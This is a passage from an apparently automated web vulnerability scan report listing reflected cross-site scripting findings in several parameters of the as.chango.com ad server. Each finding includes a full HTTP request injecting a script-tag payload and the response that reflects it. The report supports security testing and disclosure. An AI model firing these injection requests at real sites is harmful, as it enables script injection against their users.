This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784957539e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder03-sj-west13ead"><script>alert(1)</script>17c0bcecbe5&bm=1.35773620016&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=wattpad.com&dsi=None&ebp=o2FngYugoHt2Y2Oheg&eid=Rubicon&ht=250&ibs=None&kf=452151&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=b9930120-ef97-11e0-9408-00259035e51e&st=broad&stid=wattpad.com&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849575383&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories&wh=300&wp=2A68251C3E718625&sig=e682501f8c01fe1c4019354e8f499890 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; cc.i.10449=13715%7Cnews.com.au%7C5829597%7CRubicon%7C10449%7Cnamemedia%7C11782%7Cbroad; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_ab=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "9082673b85e086c70381cc03c1c1845a4d76fd9a"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 05 Oct 2011 21:34:18 GMT
Content-Length: 2227
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e303fb907dd06973053; Domain=chango.com; expires=Sat, 02 Oct 2021 21:34:18 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Fri, 04 Nov 2011 21:34:18 GMT; Path=/

<html><head><title></title>
</head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.28618
...[SNIP]...
d=b9930120-ef97-11e0-9408-00259035e51e&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.35773620016&wp=1.330389&kw=Malware+freeware&uf=0&kf=452151&atype=HISTORIC&test=0&adpos=0&bidder=bidder03-sj-west13ead"><script>alert(1)</script>17c0bcecbe5&ioi=13672&ts=1317849575383&sig=e682501f8c01fe1c4019354e8f499890&cu=&dsi=None&clickURL=">
...[SNIP]...

3.20. http://as.chango.com/links/adunit/1.31784957539e+12 [datc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784957539e+12

Issue detail

The value of the datc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0522"><script>alert(1)</script>391af6259ec was submitted in the datc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784957539e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder03-sj-west&bm=1.35773620016&cid=10449&da=10087&datc=san+josea0522"><script>alert(1)</script>391af6259ec&dc=namemedia&dom=wattpad.com&dsi=None&ebp=o2FngYugoHt2Y2Oheg&eid=Rubicon&ht=250&ibs=None&kf=452151&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=b9930120-ef97-11e0-9408-00259035e51e&st=broad&stid=wattpad.com&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849575383&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories&wh=300&wp=2A68251C3E718625&sig=e682501f8c01fe1c4019354e8f499890 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; cc.i.10449=13715%7Cnews.com.au%7C5829597%7CRubicon%7C10449%7Cnamemedia%7C11782%7Cbroad; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_ab=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "8158b3de3bf08387e8525fd01f7cdf6f3a3c5fd1"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 05 Oct 2011 21:34:18 GMT
Content-Length: 2230
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e303fb907dd06973053; Domain=chango.com; expires=Sat, 02 Oct 2021 21:34:18 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Fri, 04 Nov 2011 21:34:18 GMT; Path=/

<html><head><title></title>
</head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.28618
...[SNIP]...
id=wattpad.com&url=http://www.wattpad.com/stories&dom=wattpad.com&ibs=None&mw=1.0&poo=p&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=b9930120-ef97-11e0-9408-00259035e51e&dc=namemedia&datc=san josea0522"><script>alert(1)</script>391af6259ec&da=10087&st=broad&bm=1.35773620016&wp=1.330389&kw=Malware+freeware&uf=0&kf=452151&atype=HISTORIC&test=0&adpos=0&bidder=bidder03-sj-west&ioi=13672&ts=1317849575383&sig=e682501f8c01fe1c4019354e8f499890&
...[SNIP]...

3.21. http://as.chango.com/links/adunit/1.31784957539e+12 [dc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784957539e+12

Issue detail

The value of the dc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af091"><script>alert(1)</script>e19a7ee16f3 was submitted in the dc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784957539e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder03-sj-west&bm=1.35773620016&cid=10449&da=10087&datc=san+jose&dc=namemediaaf091"><script>alert(1)</script>e19a7ee16f3&dom=wattpad.com&dsi=None&ebp=o2FngYugoHt2Y2Oheg&eid=Rubicon&ht=250&ibs=None&kf=452151&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=b9930120-ef97-11e0-9408-00259035e51e&st=broad&stid=wattpad.com&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849575383&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories&wh=300&wp=2A68251C3E718625&sig=e682501f8c01fe1c4019354e8f499890 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; cc.i.10449=13715%7Cnews.com.au%7C5829597%7CRubicon%7C10449%7Cnamemedia%7C11782%7Cbroad; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_ab=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "f5868203de9280f21b44fcd2ee41f6fb54c2cd02"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2230
Date: Wed, 05 Oct 2011 21:34:19 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e303fb907dd06973053; Domain=chango.com; expires=Sat, 02 Oct 2021 21:34:19 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon%7C10449%7Cnamemediaaf091%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ee19a7ee16f3%7C11720%7Cbroad; Domain=chango.com; expires=Fri, 04 Nov 2011 21:34:19 GMT; Path=/

<html><head><title></title>
</head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.28618
...[SNIP]...
&agid=11720&stid=wattpad.com&url=http://www.wattpad.com/stories&dom=wattpad.com&ibs=None&mw=1.0&poo=p&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=b9930120-ef97-11e0-9408-00259035e51e&dc=namemediaaf091"><script>alert(1)</script>e19a7ee16f3&datc=san jose&da=10087&st=broad&bm=1.35773620016&wp=1.330389&kw=Malware+freeware&uf=0&kf=452151&atype=HISTORIC&test=0&adpos=0&bidder=bidder03-sj-west&ioi=13672&ts=1317849575383&sig=e682501f8c01fe1c401
...[SNIP]...

3.22. http://as.chango.com/links/adunit/1.31784957539e+12 [dom parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784957539e+12

Issue detail

The value of the dom request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3410b"><script>alert(1)</script>e875639c3a2 was submitted in the dom parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784957539e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder03-sj-west&bm=1.35773620016&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=wattpad.com3410b"><script>alert(1)</script>e875639c3a2&dsi=None&ebp=o2FngYugoHt2Y2Oheg&eid=Rubicon&ht=250&ibs=None&kf=452151&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=b9930120-ef97-11e0-9408-00259035e51e&st=broad&stid=wattpad.com&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849575383&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories&wh=300&wp=2A68251C3E718625&sig=e682501f8c01fe1c4019354e8f499890 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; cc.i.10449=13715%7Cnews.com.au%7C5829597%7CRubicon%7C10449%7Cnamemedia%7C11782%7Cbroad; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_ab=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "c19bde51e79318fb6819c509279f981b85c912dd"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2230
Date: Wed, 05 Oct 2011 21:34:19 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e303fb907dd06973053; Domain=chango.com; expires=Sat, 02 Oct 2021 21:34:19 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Fri, 04 Nov 2011 21:34:19 GMT; Path=/

<html><head><title></title>
</head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.28618
...[SNIP]...
CHANGO/B5866234.13;sz=300x250;ord=1317850459551;click1=http://as.chango.com/links/click1317850459.56?acid=10699&adid=13713&agid=11720&stid=wattpad.com&url=http://www.wattpad.com/stories&dom=wattpad.com3410b"><script>alert(1)</script>e875639c3a2&ibs=None&mw=1.0&poo=p&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=b9930120-ef97-11e0-9408-00259035e51e&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.35773620016&wp=1.330389&kw=Malware+freewa
...[SNIP]...

3.23. http://as.chango.com/links/adunit/1.31784957539e+12 [eid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784957539e+12

Issue detail

The value of the eid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c658"><script>alert(1)</script>493dfe1f8c5 was submitted in the eid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784957539e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder03-sj-west&bm=1.35773620016&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=wattpad.com&dsi=None&ebp=o2FngYugoHt2Y2Oheg&eid=Rubicon8c658"><script>alert(1)</script>493dfe1f8c5&ht=250&ibs=None&kf=452151&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=b9930120-ef97-11e0-9408-00259035e51e&st=broad&stid=wattpad.com&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849575383&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories&wh=300&wp=2A68251C3E718625&sig=e682501f8c01fe1c4019354e8f499890 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; cc.i.10449=13715%7Cnews.com.au%7C5829597%7CRubicon%7C10449%7Cnamemedia%7C11782%7Cbroad; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_ab=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "006c48235ce5cff483fa2326ac3405c502a55649"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 05 Oct 2011 21:34:21 GMT
Content-Length: 2209
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e303fb907dd06973053; Domain=chango.com; expires=Sat, 02 Oct 2021 21:34:21 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon8c658%22%3E%3Cscript%3Ealert%281%29%3C/script%3E493dfe1f8c5%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Fri, 04 Nov 2011 21:34:21 GMT; Path=/

<html><head><title></title>
</head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.28618
...[SNIP]...
;click1=http://as.chango.com/links/click1317850461.81?acid=10699&adid=13713&agid=11720&stid=wattpad.com&url=http://www.wattpad.com/stories&dom=wattpad.com&ibs=None&mw=1.0&poo=p&kwid=5827704&eid=Rubicon8c658"><script>alert(1)</script>493dfe1f8c5&cid=10449&agid=11720&sid=b9930120-ef97-11e0-9408-00259035e51e&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.35773620016&wp=0&kw=Malware+freeware&uf=0&kf=452151&atype=HISTORIC&test=0&adpos=0&bidder
...[SNIP]...

3.24. http://as.chango.com/links/adunit/1.31784957539e+12 [ht parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784957539e+12

Issue detail

The value of the ht request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f36c7"><script>alert(1)</script>0735a5f57f5 was submitted in the ht parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784957539e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder03-sj-west&bm=1.35773620016&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=wattpad.com&dsi=None&ebp=o2FngYugoHt2Y2Oheg&eid=Rubicon&ht=250f36c7"><script>alert(1)</script>0735a5f57f5&ibs=None&kf=452151&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=b9930120-ef97-11e0-9408-00259035e51e&st=broad&stid=wattpad.com&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849575383&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories&wh=300&wp=2A68251C3E718625&sig=e682501f8c01fe1c4019354e8f499890 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; cc.i.10449=13715%7Cnews.com.au%7C5829597%7CRubicon%7C10449%7Cnamemedia%7C11782%7Cbroad; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_ab=1

Response

HTTP/1.1 200 OK
Content-Length: 466
Server: Chango RTB Server
ETag: "d1dc3f79511f633e6cb28cef53737edf38cfb808"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 05 Oct 2011 21:34:22 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e303fb907dd06973053; Domain=chango.com; expires=Sat, 02 Oct 2021 21:34:22 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Fri, 04 Nov 2011 21:34:22 GMT; Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
</head>
<body style="width: 300px; height: 250f36c7"><script>alert(1)</script>0735a5f57f5px; margin: 0; padding: 0;">
...[SNIP]...

3.25. http://as.chango.com/links/adunit/1.31784957539e+12 [ibs parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784957539e+12

Issue detail

The value of the ibs request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 996f0"><script>alert(1)</script>6ebd514624f was submitted in the ibs parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784957539e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder03-sj-west&bm=1.35773620016&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=wattpad.com&dsi=None&ebp=o2FngYugoHt2Y2Oheg&eid=Rubicon&ht=250&ibs=None996f0"><script>alert(1)</script>6ebd514624f&kf=452151&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=b9930120-ef97-11e0-9408-00259035e51e&st=broad&stid=wattpad.com&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849575383&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories&wh=300&wp=2A68251C3E718625&sig=e682501f8c01fe1c4019354e8f499890 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; cc.i.10449=13715%7Cnews.com.au%7C5829597%7CRubicon%7C10449%7Cnamemedia%7C11782%7Cbroad; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_ab=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "0c9e91612d0e73ab78a996ad58689ecf733ed273"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2230
Date: Wed, 05 Oct 2011 21:34:22 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e303fb907dd06973053; Domain=chango.com; expires=Sat, 02 Oct 2021 21:34:22 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Fri, 04 Nov 2011 21:34:22 GMT; Path=/

<html><head><title></title>
</head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.28618
...[SNIP]...
866234.13;sz=300x250;ord=1317850462613;click1=http://as.chango.com/links/click1317850462.62?acid=10699&adid=13713&agid=11720&stid=wattpad.com&url=http://www.wattpad.com/stories&dom=wattpad.com&ibs=None996f0"><script>alert(1)</script>6ebd514624f&mw=1.0&poo=p&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=b9930120-ef97-11e0-9408-00259035e51e&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.35773620016&wp=1.330389&kw=Malware+freeware&uf=0&k
...[SNIP]...

3.26. http://as.chango.com/links/adunit/1.31784957539e+12 [poo parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784957539e+12

Issue detail

The value of the poo request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62468"><script>alert(1)</script>d1df17537fc was submitted in the poo parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784957539e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder03-sj-west&bm=1.35773620016&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=wattpad.com&dsi=None&ebp=o2FngYugoHt2Y2Oheg&eid=Rubicon&ht=250&ibs=None&kf=452151&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p62468"><script>alert(1)</script>d1df17537fc&sid=b9930120-ef97-11e0-9408-00259035e51e&st=broad&stid=wattpad.com&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849575383&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories&wh=300&wp=2A68251C3E718625&sig=e682501f8c01fe1c4019354e8f499890 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; cc.i.10449=13715%7Cnews.com.au%7C5829597%7CRubicon%7C10449%7Cnamemedia%7C11782%7Cbroad; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_ab=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "9d9701cdc8c7c08e62db80f02cb9718d78bad2a5"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2230
Date: Wed, 05 Oct 2011 21:34:24 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e303fb907dd06973053; Domain=chango.com; expires=Sat, 02 Oct 2021 21:34:24 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Fri, 04 Nov 2011 21:34:24 GMT; Path=/

<html><head><title></title>
</head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.28618
...[SNIP]...
300x250;ord=1317850464785;click1=http://as.chango.com/links/click1317850464.79?acid=10699&adid=13713&agid=11720&stid=wattpad.com&url=http://www.wattpad.com/stories&dom=wattpad.com&ibs=None&mw=1.0&poo=p62468"><script>alert(1)</script>d1df17537fc&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=b9930120-ef97-11e0-9408-00259035e51e&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.35773620016&wp=1.330389&kw=Malware+freeware&uf=0&kf=452151&atyp
...[SNIP]...

3.27. http://as.chango.com/links/adunit/1.31784957539e+12 [sid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784957539e+12

Issue detail

The value of the sid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b9c5"><script>alert(1)</script>48c2cd12581 was submitted in the sid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

